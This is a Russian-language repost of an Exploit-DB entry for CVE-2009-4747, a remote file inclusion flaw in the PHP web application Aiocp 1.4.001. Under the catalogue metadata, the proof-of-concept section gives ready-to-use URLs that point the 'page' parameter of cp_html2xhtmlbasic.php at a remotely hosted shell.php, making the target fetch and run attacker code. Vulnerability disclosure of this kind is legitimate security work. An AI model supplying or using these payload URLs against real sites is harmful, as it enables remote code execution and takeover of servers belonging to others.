- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10057
- Проверка EDB
-
- Пройдено
- Автор
- HADI KIAMARSI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-4747
- Дата публикации
- 2009-10-07
Код:
###########################################
#
# Aiocp 1.4.001 Remote File Inclusion vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://sourceforge.net/projects/aiocp/files/aiocp/AIOCP%201.4.001/aiocp_1_4_001.zip/download
#
###########################################
PoC :
http://[TARGET]/[PATH]/public/code/cp_html2xhtmlbasic.php?page=[SHELL]
example :
http://[TARGET]/[PATH]/public/code/cp_html2xhtmlbasic.php?page=http://www.example.com/shell.php
local Example :
http://localhost/root/public/code/cp_html2xhtmlbasic.php?page=http://127.0.0.1/shell.php- Источник
- www.exploit-db.com
